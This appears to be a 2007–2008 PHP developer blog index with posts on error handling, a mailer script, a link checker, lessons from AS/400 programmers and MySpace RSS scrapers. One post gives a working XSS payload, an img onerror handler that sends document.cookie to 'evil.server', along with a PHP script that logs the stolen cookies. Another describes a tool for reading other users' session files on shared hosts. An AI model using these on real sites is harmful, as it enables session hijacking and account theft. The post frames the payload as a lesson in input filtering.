Which Fires First? Error Handler or Shutdown Function

April 24th, 2008 by Aaron

I was working on writing a shutdown function for a PHP 4 script and noticed some odd behavior when I was getting errors (no way! I program and get errors? Who knew!?) At any rate, when I would handle my error with my custom function, I noticed the shutdown function was still executing after the error function. (Or when it was a Fatal error, the error was shown to the screen but the shutdown function was still ran…)

This got me to thinking about handling error redirection pages and sending messages on fatal errors in PHP4 (you’ll remember that a fatal error won’t execute the error handler, and therefore most of our custom code to make a nice ‘message’ won’t execute). But anyway, I digress.

I’m using PHP5.2 - this is the code I used to test:

1
2
3
4
5
6
7
8
9
10
11

<?php
function error_function() {
  print 'error function';
}
function shutdown_function() {
  print 'shutdown function';
}
set_error_handler('error_function');
register_shutdown_function('shutdown_function');
print 1/0;
?>

So, as you can tell, the error handler happens FIRST and then the shutdown function

SimplePHPMailer

April 24th, 2008 by Aaron

There are a very small amount of really easy to implement PHP mailer scripts in the wild. They usually try to pump so many features into them that it becomes difficult to implement or too large of a file. For those looking for just a quick drop-in solution - that you DON’T need to know PHP to use - SimplePHPMailer was developed. All that is needed is to drop the php file into the same area as your form, open it up, and read the instructions. There are some straight forward configuration options with very easy to understand comments. Download it for your next quick project.

SimplePHPMailer 0.1a

PHP Shared Host - Session File Browser Script

April 24th, 2008 by Aaron

PHP stores its session information into flat files unencrypted by default. In shared hosting situations, this can be a big security issue. This script allows easy access to the attributes of these files as well as decoding of the values stored in them. This script can also be used to audit the security of your current configuration. If other users’ session information is available, your information is not secure either!

Session Browser 0.1a

XSS with Img OnError attribute

March 19th, 2008 by Aaron

So much of my time is spent worrying over the src or href tags on images and links - that I sometimes forget about the other attributes.

Imagine being able to make an image which has no black-flagged content in the src but yet can still make a remote request, logging the user’s cookie information? Thats right - this can be done - using the ‘onerror’ attribute of an image.

What you need to do is to create an image link that is obviously broken or empty. Then, javascript handles such events by throwing an error for that element. Add an item to the onerror attribute to request a remote URL as your images src - which you add on document.cookie. The remote script logs all requests, and then displays an image.

Check out the code below:

Source page without proper filtering:

1
2
3
4
5
6
7

<html>
<body>
<h1>test</h1>
<h2>asdf</h2>
<img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" />
</body>
</html>

Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php

1
2
3
4
5
6
7
8

<?php
$image_path = 'test.jpg';
header('Accept-Ranges: bytes');
header('Content-Length: ' . filesize($image_path));
header('Keep-Alive: timeout=15, max=2469');
echo file_get_contents($image_path);
file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']);
?>

Easy as that. Just another reminder to properly filter your use submitted content.

Link Checking Module - 1st attempt

March 19th, 2008 by Aaron

So I wrote some code the other day. It sat in my code repository and I never tested it. I was pretty certain it was going to be some good code, though.

A few weeks later I came back to it and looked through it - and laughed!! Anyone figure out where ALL the holes are in this code?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

<?php
class linkChecker
{
    protected $_links = array();
 
    protected $_sites = array();
 
 
    public function __construct() 
    {
 
    }
 
    public function addSite($site)
    {
        if (in_array($site, $this->_sites)) {
            throw new linkException("Site already in list");
        }
 
        $this->_sites[] = $site;
    }
 
    public function processSites()
    {
        foreach ($this->_sites as $site) {
            $this->_processLinks($site);
        }
    }
 
    protected function _processLinks($url)
    {
        $this->_addLink($url, $url);
        $d = new DomDocument;
        @$d->loadHTMLFile($url);
        foreach ($d->getElementsByTagName('a') as $link) {
            $this->_addLink($link->getAttribute('href'), $url);
        }
        unset($d);
    }
 
    protected function _addLink($link, $url)
    {
        $l = new checkableLink($link, $url);
        if (!isset($this->_links[$l->url])) {
            $this->_checkLink($l);
            $this->_links[$l->url] = $l;
        }
        unset($l);
    }
 
    protected function _checkLink(checkableLink &amp;$checkableLink)
    {
        $d = new DomDocument;
        $d->loadHTMLFile($checkableLink->url) or $checkableLink->valid = false;
    }
}
 
 
 
 
 
 
class checkableLink
{
    public $host = null;
 
    public $url = null;
 
    public $checked = false;
 
    public $valid = true;
 
    public function __construct($link = null, $url = null)
    {
        if (stripos($link, '/') === 0) {
            $this->url = $url . $link;
        }
        else {
            $this->url = $url;
        }
    }
}
 
class linkException extends exception
{}
?>

5 Things this PHP programmer learned from System-i/as400 programmers

December 9th, 2007 by Aaron

Working in a shop that has approximately 15 times more System-I as/400 iSeries (whatever you want to call it) programmers, I’ve been immersed into their culture, standards and mindset.

As you can imagine, as a fresh new programmer for emerging web technologies, there was some struggle between me and the analysts for this older language. However, as I stepped back and actually looked at their directions, suggestions and practice, I found 5 things that I actually should integrate into my methodology.

1. Make necessary text settings dynamic using databases
Generally, these programmers have progressed through their career under highly strict and audit-able programming and promoting to production environments. Because of that, they tend to leave a lot of the actual text in their applications separate from their programming logic. This allows them to get their application out in production, and then just change the data in the databases (or files as they call them. Also in our environment, changing data is a lot easier than changing programming).

PHP programmers should be used to this as well when creating multi language applications. I learned that this could be useful in situations where I only have one language - especially when working with business users who aren’t fully set on their wording until after the application hits production. (Just recently, I changed 3 help texts for an application at work - and it took me about 3 minutes of database manipulation - rather than an hour of checking out code, modifying it, repromoting it, etc.)

2. Add additional logic situation by creating database driven action rules
For whatever reason, you might find yourself wanting to introduce different language for different partners (in our case states). Previously, we had created state switch statements in shared code to determine what to do for any particular state. However, this means that I had to keep the code up to date in areas where it wasn’t explicitly shared with code that referenced specific states. If we added a new state ever, we’d have to go and modify everyone’s code again.

The system-i programmers had been creating rules for these type of situation. Basically a rule is a numeric record with a state or environment specifier and then a yes/no value. Then, they would intelligently program their logic around these rules. The environment or state where the rule was being retrieved from had the proper value for that state. For example, if I were getting rule 114 from WI.t_rules it might be 1. Rule 114 from IA.t_rules would have a 0. This also adds flexibility for environments who made a decision to do it one way, but now want to do it another way.

3. Separate your logic into smaller objects and keep your display separate
System-I programmers can make display files which is basically a type of interface to show data. Also, they are moving to more and more of a modularized system - which is something I’ve always wanted to do (using MVC pattern). They are introducing more service programs who’s only duty is to take a parameter and do a quick specific calculation and return them. This was a cool reiteration of a programming concept that I already knew. Their service programs are very similar to web services - which is encouraging me to keep thinking of making more and more service oriented architecture.

4. Validate your data
Although this is an obvious thing - and this is something I shouldn’t have had to re-learn, you do end up getting lazy when you’re programming for your own projects all the time. When you send stuff to the System-i, say like a date field, and it is incorrect format, it will cause their program to hang (that is to say, halt and hold crash information in memory for someone to analyze). Because of this, my connection is blocking - and my page freezes too (this could be solved with a proper time-out - but we’re not covering that here.) When a program hangs, a page is generated to the system-i programmer on call. You can imagine that they’re really irritated if its in the middle of the night.

At any rate, PHP has let me become a little bit lazy. If I send an invalid date format to a function, it’ll just error - but most often continue to run. This was a good experience for me to have - I’m far more diligent about error checking my data before it even leaves my script.

5. Not everyone is a programmer / I take stack programmers for granted
This one is kind of a double point. Its amazing to me that their are two types of workers on the system-i side: the system analysts and the programmers. SA’s are responsible for quoting, designing and generally architecting the project requests that come through. The programmers take those specifications and make them reality. This is a little bit different for me as I’ve always just been in charge from start to finish. I still pretty much am right now in this organization - I do get assisted by the SA’s when the project is very cross platform, however.

The other thing that caused me some surprise is that the programmers and analysts don’t know the intricate details about their stack - that is the whole environment and programming box their using. They have an administrator who is a lot more familiar with the environment. This is kind of different for a LAMP programmer - I originally looked down on them for that - but then I realized it was positive for two reasons: It had security and it tried to separate duty and responsibility to allow more specialization.

These two things - after I realized they even existed - helped me communicate with my peers in the system-i programming side a lot better, effecient and more accurate.

So, although I like to give some of the more fun system-i programmers a hard time about programming on an old archaic language and that they can’t handle us young hotshots, there is a lot to gather from these experienced programmers.

APD post processing wrapper

November 17th, 2007 by Aaron

A while ago, I discovered the ‘joys’ of APD… and then moreso, the ‘joys’ of not being able to make heads or tails out of the output script. After digging deeper, I saw that the original directory already had some PHP scripts to parse the output. I ran those and wasn’t very impressed. Even more important, my boss wouldn’t be impressed. I needed to be able to make something that could be useful to integrate into a table (I finally used dojo to create a table…)

At any rate, I thought I might save anyone some time by posting the code here:

Continue reading APD post processing wrapper

MySpace bulletins to RSS

September 27th, 2007 by Aaron

So I’m sick of myspace… or so I say to myself. So now I log in about half the time as I did before… and this is because I’ve made the following script. It logs in and grabs each bulletin from your top bulletins. Then, it creates an RSS feed from them.

Lets check it out:

Continue reading MySpace bulletins to RSS

Create Google Advanced Search String

September 25th, 2007 by Aaron

I found an interesting article about the parameters of the advanced search URL for google. Just for fun, I tested out their concepts and they were all true. I figured maybe there was a reason to do this as a PHP class (I think I was just bored…).

You can find the code here:

Continue reading Create Google Advanced Search String

Create an RSS feed of comments from myspace

September 8th, 2007 by Aaron

Lately, I’ve been trying to find ways to reduce the amount of time I spend on stupid sites like myspace (nevermind the fact that the time it took to reduce this amount took me enough time to visit myspace 1x a day for another month - heh). At any rate, I’ve been using Google Reader alot more (I’m up to 180 or so feeds) and I thought: Why don’t I make an RSS feed o my comments - then I don’t have to go back to the site when someone sends me a comment. (Mind you, myspace does send you an e-mail when you receive a comment, but doesn’t include the content. JEMDiary does, however ;)) I searched the internet and found a few sites that are doing that for a service, and one guy who was giving away a regular expression. So, I took his idea and wrote my own php script for cron. Check it out here:

Continue reading Create an RSS feed of comments from myspace